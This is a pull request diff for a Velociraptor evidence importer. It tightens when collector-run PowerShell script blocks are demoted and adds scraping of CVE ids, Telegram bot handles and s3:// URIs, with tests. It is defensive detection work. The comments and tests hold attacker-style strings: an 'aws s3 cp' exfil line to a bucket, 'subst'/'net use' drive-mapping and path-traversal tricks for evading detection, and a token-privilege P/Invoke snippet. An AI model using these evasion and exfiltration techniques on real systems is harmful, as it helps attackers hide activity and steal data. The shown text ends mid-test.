### PR TITLE
fix(analysis): stop grading the collector as the intruder, and read what a script block names

### DIFF
--- a/companion/src/analysis/veloDetectionNoise.ts
+++ b/companion/src/analysis/veloDetectionNoise.ts
@@ -235,17 +235,25 @@ function scriptPath(row: Row): string {
  * finding: the collector, reported as the intruder, ranked above the tool the analyst was hunting.
  *
  * Unlike isGeneratedModuleScript this one is allowed to lower a High or Critical, and it has to be —
- * the finding it exists to kill was High. What makes that safe is the signal, not the ceiling: the
- * grade turns on `EventData.Path` under isDetectionToolLocation, which requires the collector ROOT
- * context and not a directory component anyone can create. Writing a payload there means already
- * holding admin on the collector's own install path, and it is the same bar thorImport and yaraGrade
- * already demote High findings on.
+ * the finding it exists to kill was High. That is why it does NOT reuse isDetectionToolLocation.
+ * That predicate matches a bare `\Velociraptor\` component, which is right for the THOR and YARA
+ * callers (their hits come from sweeping the collector's actual install) and wrong here: a 4104
+ * EventData.Path is wherever the ATTACKER put their script, so `C:\Users\v\Velociraptor\evil.ps1`
+ * would let them suppress their own Critical by choosing a directory name — the same weakness #720
+ * records for the EVTX-ATTACK / Digital-Forensic-Artifacts markers.
+ *
+ * COLLECTOR_TOOL_TREE demands what the demotion actually claims: the Program Files install root
+ * (whose default ACL costs administrator rights to write, and whose filesystem spelling is invariant
+ * across Windows display languages), plus the `\Tools\` subtree Velociraptor unpacks its PowerShell
+ * modules into. A relocated install falls outside it and keeps its noise — the safe direction to
+ * err, since the cost is a loud finding rather than a hidden one.
  *
  * A claim about WHERE the script lives, never about what it contains: the identical body run from a
  * user's Desktop keeps whatever grade it earned.
  */
+const COLLECTOR_TOOL_TREE = /^[a-z]:\\program files(?: \(x86\))?\\velociraptor\\tools\\/i;
+
 export function isDetectionToolScript(row: Row): boolean {
   if (eventId(row) !== SCRIPT_BLOCK_EID) return false;
-  const path = scriptPath(row);
-  return path ? isDetectionToolLocation(path) : false;
+  return COLLECTOR_TOOL_TREE.test(scriptPath(row));
 }

--- a/companion/src/analysis/veloDetectionNoise.ts
+++ b/companion/src/analysis/veloDetectionNoise.ts
@@ -242,18 +242,32 @@ function scriptPath(row: Row): string {
  * would let them suppress their own Critical by choosing a directory name — the same weakness #720
  * records for the EVTX-ATTACK / Digital-Forensic-Artifacts markers.
  *
- * COLLECTOR_TOOL_TREE demands what the demotion actually claims: the Program Files install root
- * (whose default ACL costs administrator rights to write, and whose filesystem spelling is invariant
- * across Windows display languages), plus the `\Tools\` subtree Velociraptor unpacks its PowerShell
- * modules into. A relocated install falls outside it and keeps its noise — the safe direction to
- * err, since the cost is a loud finding rather than a hidden one.
+ * COLLECTOR_TOOL_TREE demands what the demotion actually claims — a location the attacker had to
+ * hold administrator rights to write — and that takes three clauses, not one:
+ *
+ *   the SYSTEM drive   "Program Files" only carries an admin-only ACL where WINDOWS created it. Any
+ *                      other drive letter is a location the attacker can supply the ACL for:
+ *                      `subst Z: C:\Users\v\evil` needs no privilege whatsoever, nor does
+ *                      `net use Y: \\attacker\share`, nor writing to a USB stick. So the letter is
+ *                      pinned rather than accepted as `[a-z]:`. A machine whose system drive is not
+ *                      C: keeps its collector noise — the safe direction, since the cost is a loud
+ *                      finding rather than a hidden one, and the same trade a relocated install makes.
+ *   the install path   `\Program Files\Velociraptor\Tools\`, where the collector unpacks the
+ *                      PowerShell modules it runs. The filesystem spelling of Program Files is
+ *                      invariant across Windows display languages. Either separator, because
+ *                      PowerShell logs both and the ACL — not the slash — is doing the security work.
+ *   no traversal       a prefix match on a path holding `..` proves nothing about where the file
+ *                      actually is. PowerShell normally logs a resolved path; this does not rely on it.
  *
  * A claim about WHERE the script lives, never about what it contains: the identical body run from a
- * user's Desktop keeps whatever grade it earned.
+ * user's Desktop keeps whatever grade it earned. The call site adds the last bound, a ceiling that
+ * holds even if this reasoning is wrong again — it will not lower a Critical.
  */
-const COLLECTOR_TOOL_TREE = /^[a-z]:\\program files(?: \(x86\))?\\velociraptor\\tools\\/i;
+const COLLECTOR_TOOL_TREE = /^c:[\\/]program files(?: \(x86\))?[\\/]velociraptor[\\/]tools[\\/]/i;
+const PATH_TRAVERSAL = /(?:^|[\\/])\.\.(?:[\\/]|$)/;
 
 export function isDetectionToolScript(row: Row): boolean {
   if (eventId(row) !== SCRIPT_BLOCK_EID) return false;
-  return COLLECTOR_TOOL_TREE.test(scriptPath(row));
+  const path = scriptPath(row);
+  return COLLECTOR_TOOL_TREE.test(path) && !PATH_TRAVERSAL.test(path);
 }

--- a/companion/src/analysis/veloDetectionNoise.ts
+++ b/companion/src/analysis/veloDetectionNoise.ts
@@ -209,3 +209,43 @@ export function isGeneratedModuleScript(row: Row): boolean {
   if (!GENERATED_MARKERS.some((re) => re.test(text))) return false;
   return tradecraftSignal("", text)?.weight !== "strong";
 }
+
+// The script FILE a 4104 event was compiled from. PowerShell writes it into `EventData.Path` from
+// the engine's own view of what it loaded, so unlike the script text it is not a string the script
+// can talk about — a payload cannot claim to live somewhere it does not.
+function scriptPath(row: Row): string {
+  let ed = getCI(row, "EventData");
+  for (const w of EVENT_WRAPPERS) {
+    if (isObject(ed)) break;
+    ed = getPath(row, `${w}.EventData`);
+  }
+  return isObject(ed) ? str(getCI(ed, "Path")).trim() : "";
+}
+
+/**
+ * Is this a script block the COLLECTOR ran, out of its own tool tree?
+ *
+ * Velociraptor artifacts shell out to PowerShell modules unpacked under
+ * `\Program Files\Velociraptor\Tools\tmp*\` — Windows.Forensics.PersistenceSniper runs
+ * PersistenceSniper.psm1 there as SYSTEM. That module opens tokens via AdjustTokenPrivileges and
+ * sweeps local accounts because those are the persistence techniques it DETECTS, and broad Sigma
+ * rules grade it "Potential WinAPI Calls Via PowerShell Scripts" (High) and "Powershell LocalAccount
+ * Manipulation" (Medium) exactly as they would an intruder's. On a real eval collection synthesis
+ * read those rows as a WinPwn/Mimikatz credential-access burst and made it the case's only Critical
+ * finding: the collector, reported as the intruder, ranked above the tool the analyst was hunting.
+ *
+ * Unlike isGeneratedModuleScript this one is allowed to lower a High or Critical, and it has to be —
+ * the finding it exists to kill was High. What makes that safe is the signal, not the ceiling: the
+ * grade turns on `EventData.Path` under isDetectionToolLocation, which requires the collector ROOT
+ * context and not a directory component anyone can create. Writing a payload there means already
+ * holding admin on the collector's own install path, and it is the same bar thorImport and yaraGrade
+ * already demote High findings on.
+ *
+ * A claim about WHERE the script lives, never about what it contains: the identical body run from a
+ * user's Desktop keeps whatever grade it earned.
+ */
+export function isDetectionToolScript(row: Row): boolean {
+  if (eventId(row) !== SCRIPT_BLOCK_EID) return false;
+  const path = scriptPath(row);
+  return path ? isDetectionToolLocation(path) : false;
+}

--- a/companion/src/analysis/veloDetectionNoise.ts
+++ b/companion/src/analysis/veloDetectionNoise.ts
@@ -242,32 +242,54 @@ function scriptPath(row: Row): string {
  * would let them suppress their own Critical by choosing a directory name — the same weakness #720
  * records for the EVTX-ATTACK / Digital-Forensic-Artifacts markers.
  *
- * COLLECTOR_TOOL_TREE demands what the demotion actually claims — a location the attacker had to
- * hold administrator rights to write — and that takes three clauses, not one:
+ * What makes that safe is NOT the path. Three review passes established that a path string cannot
+ * carry this claim: the attacker chooses where their script lives, and every attempt to price that
+ * in failed. `\Velociraptor\` is a directory anyone can create. Pinning a drive letter does not help
+ * either — `subst Z: C:\Users\v\evil` and `net use Y: \\attacker\share` cost no privilege, and no
+ * hard-coded letter can tell you the EVIDENCE host's system drive, so "Program Files is admin-only"
+ * is an assumption about a filesystem this process never sees.
  *
- *   the SYSTEM drive   "Program Files" only carries an admin-only ACL where WINDOWS created it. Any
- *                      other drive letter is a location the attacker can supply the ACL for:
- *                      `subst Z: C:\Users\v\evil` needs no privilege whatsoever, nor does
- *                      `net use Y: \\attacker\share`, nor writing to a USB stick. So the letter is
- *                      pinned rather than accepted as `[a-z]:`. A machine whose system drive is not
- *                      C: keeps its collector noise — the safe direction, since the cost is a loud
- *                      finding rather than a hidden one, and the same trade a relocated install makes.
- *   the install path   `\Program Files\Velociraptor\Tools\`, where the collector unpacks the
- *                      PowerShell modules it runs. The filesystem spelling of Program Files is
- *                      invariant across Windows display languages. Either separator, because
- *                      PowerShell logs both and the ACL — not the slash — is doing the security work.
- *   no traversal       a prefix match on a path holding `..` proves nothing about where the file
- *                      actually is. PowerShell normally logs a resolved path; this does not rely on it.
+ * The identity is the control. PowerShell records the account the ENGINE ran under, and a script is
+ * logged as SYSTEM only if it actually ran as SYSTEM — which the attacker must already have. It also
+ * closes the drive-letter hole without guessing anything: `subst` and `net use` mappings are
+ * per-logon-session, so a SYSTEM process never sees the volume an unprivileged user mapped. The
+ * collector tool tree is then corroboration, not the load-bearing part, and traversal is refused
+ * because a prefix match on a path holding `..` describes nothing.
  *
- * A claim about WHERE the script lives, never about what it contains: the identical body run from a
- * user's Desktop keeps whatever grade it earned. The call site adds the last bound, a ceiling that
- * holds even if this reasoning is wrong again — it will not lower a Critical.
+ * This is still evidence rather than proof — an attacker already at SYSTEM can satisfy both. The
+ * call site supplies the last bound for that case: it will not lower a Critical, so the most a
+ * bypass buys is quieting a High, which an attacker at SYSTEM has far better ways to achieve.
+ *
+ * A claim about WHO ran the script and WHERE it lived, never about what it contains: the identical
+ * body run from a user's Desktop keeps whatever grade it earned.
  */
-const COLLECTOR_TOOL_TREE = /^c:[\\/]program files(?: \(x86\))?[\\/]velociraptor[\\/]tools[\\/]/i;
+const COLLECTOR_TOOL_TREE = /^[a-z]:[\\/]program files(?: \(x86\))?[\\/]velociraptor[\\/]tools[\\/]/i;
 const PATH_TRAVERSAL = /(?:^|[\\/])\.\.(?:[\\/]|$)/;
+const SYSTEM_SID = "S-1-5-18";
+
+// The account the PowerShell engine logged the script under, across the shapes this importer sees:
+// DetectRaptor Evtx's flat `UserSID`, Chainsaw's parsed `SystemData.Security_attributes.UserID`, and
+// the native EVTX `System.Security.UserID` with or without an Event wrapper.
+function logonSid(row: Row): string {
+  const flat = str(getCI(row, "UserSID")).trim();
+  if (flat) return flat;
+  const paths = [
+    "SystemData.Security_attributes.UserID",
+    "System.Security.UserID",
+    "System.Security_attributes.UserID",
+  ];
+  for (const w of ["", ...EVENT_WRAPPERS]) {
+    for (const path of paths) {
+      const v = str(getPath(row, w ? `${w}.${path}` : path)).trim();
+      if (v) return v;
+    }
+  }
+  return "";
+}
 
 export function isDetectionToolScript(row: Row): boolean {
   if (eventId(row) !== SCRIPT_BLOCK_EID) return false;
+  if (logonSid(row) !== SYSTEM_SID) return false;
   const path = scriptPath(row);
   return COLLECTOR_TOOL_TREE.test(path) && !PATH_TRAVERSAL.test(path);
 }

--- a/companion/src/analysis/veloTextIocs.ts
+++ b/companion/src/analysis/veloTextIocs.ts
@@ -13,9 +13,35 @@ const TEXT_URL = /\bhttps?:\/\/[^\s"'<>)\]}]+/gi;
 const TEXT_IPV4 = /\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b/g;
 const TEXT_HASH = /\b[a-f0-9]{64}\b|\b[a-f0-9]{40}\b|\b[a-f0-9]{32}\b/gi;
 
-// URLs, IPv4, SHA256/SHA1/MD5 hashes, and domains. The domain pass is the newest: a collected
-// script block names its C2 by name at least as often as by address, and until `extractDomains`
-// ran here those names were simply lost (#648).
+// The vulnerability a tool says it targets. A scanner names its own exploit module in the clear —
+// the Bissa eval's whole React2Shell/W3TC campaign said so in one script block — and until this ran
+// the CVE was read by the importer and dropped, so no report named what was being exploited.
+// The `CVE-` prefix carries the whole match; a bare `2025-55182` is a build number, not an id.
+const TEXT_CVE = /\bCVE-\d{4}-\d{4,7}\b/gi;
+
+// A Telegram BOT handle, in the two forms a script writes one. Telegram requires a bot username to
+// end in "bot", so that suffix is the platform's own rule rather than a guess, and an ordinary
+// @mention (`@BonJoviGoesHard`) never matches either form.
+//
+//   @-prefixed   the handle as a human writes it. The `@` identifies it on its own, so the name only
+//                has to be a legal username. The lookbehind keeps an email local-part out —
+//                `abuse@robot.example.com` is not a bot named `@robot`.
+//   assigned     the handle as a SCRIPT writes it: `AlertBotUsername = "bissapwned_bot"`. This is the
+//                form the Bissa eval's script block actually used, and the `@` never appeared. With
+//                no `@` to identify it the bar is higher on both sides — the KEY must name a bot too,
+//                and the value needs 9+ characters, so `robot: "mybot"` does not qualify.
+const TEXT_BOT_HANDLE = /(?<![A-Za-z0-9._%+-])@[A-Za-z][A-Za-z0-9_]{3,30}bot\b/gi;
+const TEXT_BOT_ASSIGNED = /\b\w*bot\w*\s*[:=]\s*["']([A-Za-z][A-Za-z0-9_]{5,30}bot)["']/gi;
+
+// An object-store destination written as a URI. TEXT_URL only reads http(s), so the `s3://` form an
+// exfil runner uses — `aws s3 cp results/*.zip s3://bucket/prefix/` — reached no scraper at all.
+const TEXT_S3_URI = /\bs3:\/\/[a-z0-9][a-z0-9.\-]{1,61}[a-z0-9](?:\/[^\s"'<>)\]}]*)?/gi;
+
+// URLs, IPv4, SHA256/SHA1/MD5 hashes, domains, CVE ids, Telegram bot handles and s3:// URIs. The
+// domain pass came first: a collected script block names its C2 by name at least as often as by
+// address, and until `extractDomains` ran here those names were simply lost (#648). The last three
+// are the same lesson from the Bissa eval — a script block also names the vulnerability it exploits,
+// the channel it reports hits on, and the bucket it ships them to, all in plain text.
 export function scrapeText(text: string, sink: Map<string, SiemIoc>): void {
   if (!text) return;
   for (const m of text.matchAll(TEXT_URL)) addIoc(sink, "url", m[0].replace(/[.,;:)\]]+$/, "").slice(0, 300));
@@ -30,6 +56,13 @@ export function scrapeText(text: string, sink: Map<string, SiemIoc>): void {
   }
   for (const m of text.matchAll(TEXT_HASH)) addIoc(sink, "hash", m[0].toLowerCase());
   for (const d of extractDomains(text)) addIoc(sink, "domain", d);
+  // Canonical upper case, so `cve-2025-55182` and `CVE-2025-55182` are one indicator, not two.
+  for (const m of text.matchAll(TEXT_CVE)) addIoc(sink, "other", m[0].toUpperCase());
+  // Both forms normalize to `@handle`, so a script that names the same bot twice — once assigned,
+  // once written out — yields one indicator rather than two spellings of it.
+  for (const m of text.matchAll(TEXT_BOT_HANDLE)) addIoc(sink, "other", m[0]);
+  for (const m of text.matchAll(TEXT_BOT_ASSIGNED)) addIoc(sink, "other", `@${m[1]}`);
+  for (const m of text.matchAll(TEXT_S3_URI)) addIoc(sink, "other", m[0].slice(0, 300));
 }
 
 // The free-text fields that carry a detection's evidence (and its embedded IOCs). `ScriptBlockText`

--- a/companion/src/analysis/velociraptorImport.ts
+++ b/companion/src/analysis/velociraptorImport.ts
@@ -72,6 +72,7 @@ import { withHostSuffix, titleSafe, demangleUtf16Noise } from "./velociraptorTit
 import {
   isDetectionContentPath,
   isGeneratedModuleScript,
+  isDetectionToolScript,
   isDetectionToolLocation,
   isDetectionSampleHost,
 } from "./veloDetectionNoise.js";
@@ -1667,6 +1668,10 @@ function mapRowToEvents(row: Row, ctx: VrParseCtx): { events: MappedEvent[]; det
     // "this PowerShell looks odd" verdicts this exists to quiet are Medium and below by nature.
     if (isGeneratedModuleScript(row))
       for (const m of ms) if (m && m.severity !== "High" && m.severity !== "Critical") m.severity = "Info";
+
+    // A script block the COLLECTOR ran from its own tool tree. Demotes at ANY grade, because the
+    // signal is EventData.Path under the collector root, not a marker in the text — isDetectionToolScript.
+    if (isDetectionToolScript(row)) for (const m of ms) if (m) m.severity = "Info";
 
     // Row-level values shared by every event this row produced (computed once, not per MACB event).
     const realArtifact = artifactName(row);

--- a/companion/src/analysis/velociraptorImport.ts
+++ b/companion/src/analysis/velociraptorImport.ts
@@ -1669,8 +1669,8 @@ function mapRowToEvents(row: Row, ctx: VrParseCtx): { events: MappedEvent[]; det
     if (isGeneratedModuleScript(row))
       for (const m of ms) if (m && m.severity !== "High" && m.severity !== "Critical") m.severity = "Info";
 
-    // A script block the COLLECTOR ran from its own tool tree. Demotes at ANY grade, because the
-    // signal is EventData.Path under the collector root, not a marker in the text — isDetectionToolScript.
+    // A script block the COLLECTOR ran from its own tool tree. Demotes at ANY grade, because the signal
+    // is an EventData.Path only an administrator can write, not a marker in the text — see isDetectionToolScript.
     if (isDetectionToolScript(row)) for (const m of ms) if (m) m.severity = "Info";
 
     // Row-level values shared by every event this row produced (computed once, not per MACB event).

--- a/companion/src/analysis/velociraptorImport.ts
+++ b/companion/src/analysis/velociraptorImport.ts
@@ -1669,8 +1669,7 @@ function mapRowToEvents(row: Row, ctx: VrParseCtx): { events: MappedEvent[]; det
     if (isGeneratedModuleScript(row))
       for (const m of ms) if (m && m.severity !== "High" && m.severity !== "Critical") m.severity = "Info";
 
-    // A script block the COLLECTOR ran from its own tool tree. Demotes at ANY grade, because the signal
-    // is an EventData.Path only an administrator can write, not a marker in the text — see isDetectionToolScript.
+    // A script block SYSTEM ran from the collector's tool tree. Never a Critical — isDetectionToolScript.
     if (isDetectionToolScript(row))
       for (const m of ms) if (m && m.severity !== "Critical") m.severity = "Info";
 

--- a/companion/src/analysis/velociraptorImport.ts
+++ b/companion/src/analysis/velociraptorImport.ts
@@ -1671,7 +1671,8 @@ function mapRowToEvents(row: Row, ctx: VrParseCtx): { events: MappedEvent[]; det
 
     // A script block the COLLECTOR ran from its own tool tree. Demotes at ANY grade, because the signal
     // is an EventData.Path only an administrator can write, not a marker in the text — see isDetectionToolScript.
-    if (isDetectionToolScript(row)) for (const m of ms) if (m) m.severity = "Info";
+    if (isDetectionToolScript(row))
+      for (const m of ms) if (m && m.severity !== "Critical") m.severity = "Info";
 
     // Row-level values shared by every event this row produced (computed once, not per MACB event).
     const realArtifact = artifactName(row);

--- a/companion/tests/analysis/evalFixes.test.ts
+++ b/companion/tests/analysis/evalFixes.test.ts
@@ -131,3 +131,75 @@ describe("IOC hygiene — code tokens are not domains", () => {
     expect(got).toContain("evil.com");
   });
 });
+
+// Identifiers a script block names in plain text and no scraper reads.
+//
+// From the Bissa-scanner eval: the whole campaign — both target CVEs, both Telegram bot handles,
+// the exfil bucket, the acquirer domains — arrived in ONE 4104 script block. The domain pass (#648)
+// caught the domains. The CVEs and the bot handles were read by the importer and dropped on the
+// floor, so no finding, no IOC, and no report ever named the vulnerability being exploited or the
+// channel the operator was alerted on.
+describe("IOC hygiene — identifiers named inside a script block", () => {
+  const values = (text: string) => {
+    const sink = new Map<string, SiemIoc>();
+    scrapeText(text, sink);
+    return [...sink.values()].map((i) => i.value);
+  };
+
+  it("extracts a CVE id the script names as its exploitation target", () => {
+    expect(values("react2shell module targeting CVE-2025-55182")).toContain("CVE-2025-55182");
+  });
+
+  it("extracts every CVE in a block that names more than one", () => {
+    const v = values("modules: CVE-2025-55182 (RCE) and CVE-2025-9501 (version-check only)");
+    expect(v).toContain("CVE-2025-55182");
+    expect(v).toContain("CVE-2025-9501");
+  });
+
+  it("normalizes a lowercase cve id to the canonical form", () => {
+    expect(values("cve-2025-55182")).toContain("CVE-2025-55182");
+  });
+
+  it("does not read a bare year-number pair as a CVE", () => {
+    expect(values("build 2025-55182 shipped")).not.toContain("CVE-2025-55182");
+  });
+
+  // Telegram requires a bot username to end in "bot", so the suffix is the platform's own rule and
+  // not a guess — an @mention that is not a bot never matches.
+  it("extracts a Telegram bot handle used for operator alerting", () => {
+    expect(values("AlertBotUsername = 'bissapwned_bot' -> @bissapwned_bot")).toContain("@bissapwned_bot");
+  });
+
+  it("extracts a second bot handle named in the same block", () => {
+    expect(values("alert bot @bissapwned_bot, ai-control bot @bissa_scan_bot")).toContain("@bissa_scan_bot");
+  });
+
+  // How the eval's script block actually wrote it: assigned to a key, no `@` anywhere in the file.
+  it("extracts a bot handle a script assigned to a bot-named key with no @", () => {
+    const v = values('    AlertBotUsername  = "bissapwned_bot"\n    AiControlBot      = "bissa_scan_bot"');
+    expect(v).toContain("@bissapwned_bot");
+    expect(v).toContain("@bissa_scan_bot");
+  });
+
+  it("counts the assigned and written-out spellings of one bot as a single indicator", () => {
+    expect(values('AlertBotUsername = "bissapwned_bot" alerts @bissapwned_bot')).toEqual(["@bissapwned_bot"]);
+  });
+
+  it("does not read a short word ending in bot as an assigned handle", () => {
+    expect(values('robot: "mybot"')).toEqual([]);
+  });
+
+  it("does not read an ordinary @mention as a bot handle", () => {
+    expect(values("operator handle @BonJoviGoesHard")).not.toContain("@BonJoviGoesHard");
+  });
+
+  it("does not read an email address as a bot handle", () => {
+    expect(values("contact abuse@robot.example.com")).not.toContain("@robot");
+  });
+
+  it("extracts an s3:// destination the script uploads to", () => {
+    expect(values("aws s3 cp results/*.zip s3://bissapromax/archives/")).toContain(
+      "s3://bissapromax/archives/",
+    );
+  });
+});

--- a/companion/tests/analysis/velociraptorImport.test.ts
+++ b/companion/tests/analysis/velociraptorImport.test.ts
@@ -3980,11 +3980,41 @@ describe("parseVelociraptorJson — script blocks run by the collector itself", 
     expect(parseVelociraptorJson(JSON.stringify([row])).events[0].severity).toBe("High");
   });
 
-  // A lone `\sigma\` or `\Tools\tmp` component is a directory anyone can create. Only the collector
-  // ROOT context demotes — the same bar isDetectionToolLocation already sets for THOR and YARA.
-  it("does not demote on a directory name an attacker can choose", () => {
+  // EVERY path below is one an UNPRIVILEGED user can create. isDetectionToolLocation — right for the
+  // THOR/YARA callers, whose hits come from scanning the real install — matches a bare `\Velociraptor\`
+  // component, so using it here would let an attacker suppress their own Critical by choosing a
+  // directory name (the weakness #720 records for the other markers). This call site lowers a High,
+  // so it demands the Program Files install root instead, which costs administrator rights to write.
+  it.each([
+    ["a Velociraptor directory under the user profile", "C:\\Users\\vagrant\\Velociraptor\\evil.ps1"],
+    [
+      "a tool tree forged under AppData",
+      "C:\\Users\\v\\AppData\\Local\\Temp\\Velociraptor\\Tools\\tmp1\\x.psm1",
+    ],
+    ["a Velociraptor share the attacker controls", "\\\\attacker\\Velociraptor\\Tools\\tmp1\\x.psm1"],
+    ["the sample-corpus name as a folder", "C:\\Users\\v\\EVTX-ATTACK-SAMPLES\\evil.ps1"],
+    ["the simulation-repo name as a folder", "C:\\Users\\v\\Digital-Forensic-Artifacts\\evil.ps1"],
+    ["a lone sigma directory", "C:\\Users\\v\\sigma\\evil.ps1"],
+    ["ProgramData, which is user-writable by default", "C:\\ProgramData\\Velociraptor\\Tools\\tmp1\\x.psm1"],
+  ])("does not demote a High from %s", (_label, path) => {
+    const row = pwshRow(path, "high", "Potential WinAPI Calls Via PowerShell Scripts");
+    expect(parseVelociraptorJson(JSON.stringify([row])).events[0].severity).toBe("High");
+  });
+
+  it("demotes from the 32-bit install root as well", () => {
     const row = pwshRow(
-      "C:\\Users\\v\\sigma\\evil.ps1",
+      "C:\\Program Files (x86)\\Velociraptor\\Tools\\tmp1\\PersistenceSniper\\PersistenceSniper.psm1",
+      "high",
+      "Potential WinAPI Calls Via PowerShell Scripts",
+    );
+    expect(parseVelociraptorJson(JSON.stringify([row])).events[0].severity).toBe("Info");
+  });
+
+  // Program Files alone is not enough: collector-run modules always land in the unpacked \Tools\
+  // subtree, so a script sitting beside the binary is not something the collector ran.
+  it("does not demote a script dropped beside the collector binary", () => {
+    const row = pwshRow(
+      "C:\\Program Files\\Velociraptor\\evil.ps1",
       "high",
       "Potential WinAPI Calls Via PowerShell Scripts",
     );

--- a/companion/tests/analysis/velociraptorImport.test.ts
+++ b/companion/tests/analysis/velociraptorImport.test.ts
@@ -3931,6 +3931,7 @@ describe("parseVelociraptorJson — aggregation key cap must not cost the host",
 // those rows as a WinPwn/Mimikatz credential-access burst and made it the case's only Critical
 // finding — the collector reported as the intruder.
 describe("parseVelociraptorJson — script blocks run by the collector itself", () => {
+  const USER_SID = "S-1-5-21-908230818-3748298786-230204725-1001";
   const COLLECTOR_PSM1 =
     "C:\\Program Files\\Velociraptor\\Tools\\tmp1898735674\\PersistenceSniper\\PersistenceSniper.psm1";
   // PersistenceSniper's real body: a P/Invoke block Sigma reads as WinAPI abuse.
@@ -3938,7 +3939,7 @@ describe("parseVelociraptorJson — script blocks run by the collector itself", 
     "Add-Type -TypeDefinition @'\r\npublic class AdjPriv {\r\n" +
     '  [DllImport("advapi32.dll")] internal static extern bool AdjustTokenPrivileges(...);\r\n}\r\n\'@\r\n';
 
-  const pwshRow = (path: string, level: string, title: string) => ({
+  const pwshRow = (path: string, level: string, title: string, sid = "S-1-5-18") => ({
     _Source: "Windows.Sigma.Base",
     Timestamp: "2026-08-30T09:09:21Z",
     Computer: "DESKTOP-16OJFO6",
@@ -3952,7 +3953,7 @@ describe("parseVelociraptorJson — script blocks run by the collector itself", 
         EventID: { Value: 4104 },
         Channel: "Microsoft-Windows-PowerShell/Operational",
         Computer: "DESKTOP-16OJFO6",
-        Security: { UserID: "S-1-5-18" },
+        Security: { UserID: sid },
         TimeCreated: { SystemTime: 1787130561 },
       },
       EventData: { MessageNumber: 1, MessageTotal: 8, Path: path, ScriptBlockText: SNIPER_BODY },
@@ -3980,11 +3981,13 @@ describe("parseVelociraptorJson — script blocks run by the collector itself", 
     expect(parseVelociraptorJson(JSON.stringify([row])).events[0].severity).toBe("High");
   });
 
-  // EVERY path below is one an UNPRIVILEGED user can create. isDetectionToolLocation — right for the
-  // THOR/YARA callers, whose hits come from scanning the real install — matches a bare `\Velociraptor\`
-  // component, so using it here would let an attacker suppress their own Critical by choosing a
-  // directory name (the weakness #720 records for the other markers). This call site lowers a High,
-  // so it demands the Program Files install root instead, which costs administrator rights to write.
+  // EVERY path below is one an UNPRIVILEGED user can create, and each runs under a NORMAL user SID.
+  // isDetectionToolLocation — right for the THOR/YARA callers, whose hits come from sweeping the real
+  // install — matches a bare `\Velociraptor\` component, so using it here would let an attacker
+  // suppress their own finding by choosing a directory name (the weakness #720 records for the other
+  // markers). Pinning a drive letter does not fix that: `subst Z: C:\Users\v\evil` and
+  // `net use Y: \\attacker\share` cost no privilege, and no letter tells you the EVIDENCE host's
+  // system drive. What the attacker cannot supply is the identity the PowerShell engine logged.
   it.each([
     ["a Velociraptor directory under the user profile", "C:\\Users\\vagrant\\Velociraptor\\evil.ps1"],
     [
@@ -4007,8 +4010,12 @@ describe("parseVelociraptorJson — script blocks run by the collector itself", 
       "C:\\Program Files\\Velociraptor\\Tools\\..\\..\\..\\Users\\v\\evil.ps1",
     ],
     ["an extended-length prefix", "\\\\?\\C:\\Program Files\\Velociraptor\\Tools\\tmp1\\x.psm1"],
+    [
+      "the genuine install path itself",
+      "C:\\Program Files\\Velociraptor\\Tools\\tmp1\\PersistenceSniper.psm1",
+    ],
   ])("does not demote a High from %s", (_label, path) => {
-    const row = pwshRow(path, "high", "Potential WinAPI Calls Via PowerShell Scripts");
+    const row = pwshRow(path, "high", "Potential WinAPI Calls Via PowerShell Scripts", USER_SID);
     expect(parseVelociraptorJson(JSON.stringify([row])).events[0].severity).toBe("High");
   });
 
@@ -4030,6 +4037,23 @@ describe("parseVelociraptorJson — script blocks run by the collector itself", 
       "Potential WinAPI Calls Via PowerShell Scripts",
     );
     expect(parseVelociraptorJson(JSON.stringify([row])).events[0].severity).toBe("High");
+  });
+
+  // The control that actually holds. The attacker owns the path — every string above proves it — but
+  // cannot make the engine log their script under SYSTEM without already BEING SYSTEM. It closes the
+  // drive-letter hole without guessing a system drive: `subst` and `net use` mappings are
+  // per-logon-session, so a SYSTEM process never sees the volume an unprivileged user mapped.
+  it("does not demote a High that SYSTEM ran from outside the collector tree", () => {
+    const row = pwshRow("C:\\Users\\v\\evil.ps1", "high", "Potential WinAPI Calls Via PowerShell Scripts");
+    expect(parseVelociraptorJson(JSON.stringify([row])).events[0].severity).toBe("High");
+  });
+
+  it("reads the SID from the flat UserSID column a DetectRaptor Evtx row carries", () => {
+    const row: Record<string, unknown> = {
+      ...pwshRow(COLLECTOR_PSM1, "high", "Potential WinAPI Calls Via PowerShell Scripts", USER_SID),
+      UserSID: "S-1-5-18",
+    };
+    expect(parseVelociraptorJson(JSON.stringify([row])).events[0].severity).toBe("Info");
   });
 
   it("accepts the forward-slash spelling of the same install path", () => {

--- a/companion/tests/analysis/velociraptorImport.test.ts
+++ b/companion/tests/analysis/velociraptorImport.test.ts
@@ -3920,3 +3920,79 @@ describe("parseVelociraptorJson — aggregation key cap must not cost the host",
     expect(r.events[0].count).toBe(2);
   });
 });
+
+// Script blocks the COLLECTOR ran, logged as 4104 like any other script.
+//
+// Velociraptor's own artifacts shell out to PowerShell modules it unpacks into its tool tree —
+// Windows.Forensics.PersistenceSniper runs PersistenceSniper.psm1 as SYSTEM. That module's
+// AdjustTokenPrivileges P/Invoke and its `net users` account sweep are DETECTION code, but Sigma
+// grades them "Potential WinAPI Calls Via PowerShell Scripts" (high) and "Powershell LocalAccount
+// Manipulation" (medium) exactly as it would an attacker's. On a real eval collection synthesis read
+// those rows as a WinPwn/Mimikatz credential-access burst and made it the case's only Critical
+// finding — the collector reported as the intruder.
+describe("parseVelociraptorJson — script blocks run by the collector itself", () => {
+  const COLLECTOR_PSM1 =
+    "C:\\Program Files\\Velociraptor\\Tools\\tmp1898735674\\PersistenceSniper\\PersistenceSniper.psm1";
+  // PersistenceSniper's real body: a P/Invoke block Sigma reads as WinAPI abuse.
+  const SNIPER_BODY =
+    "Add-Type -TypeDefinition @'\r\npublic class AdjPriv {\r\n" +
+    '  [DllImport("advapi32.dll")] internal static extern bool AdjustTokenPrivileges(...);\r\n}\r\n\'@\r\n';
+
+  const pwshRow = (path: string, level: string, title: string) => ({
+    _Source: "Windows.Sigma.Base",
+    Timestamp: "2026-08-30T09:09:21Z",
+    Computer: "DESKTOP-16OJFO6",
+    Channel: "Microsoft-Windows-PowerShell/Operational",
+    EID: 4104,
+    Level: level,
+    Title: title,
+    Details: `ScriptBlock: ${SNIPER_BODY}`,
+    _Event: {
+      System: {
+        EventID: { Value: 4104 },
+        Channel: "Microsoft-Windows-PowerShell/Operational",
+        Computer: "DESKTOP-16OJFO6",
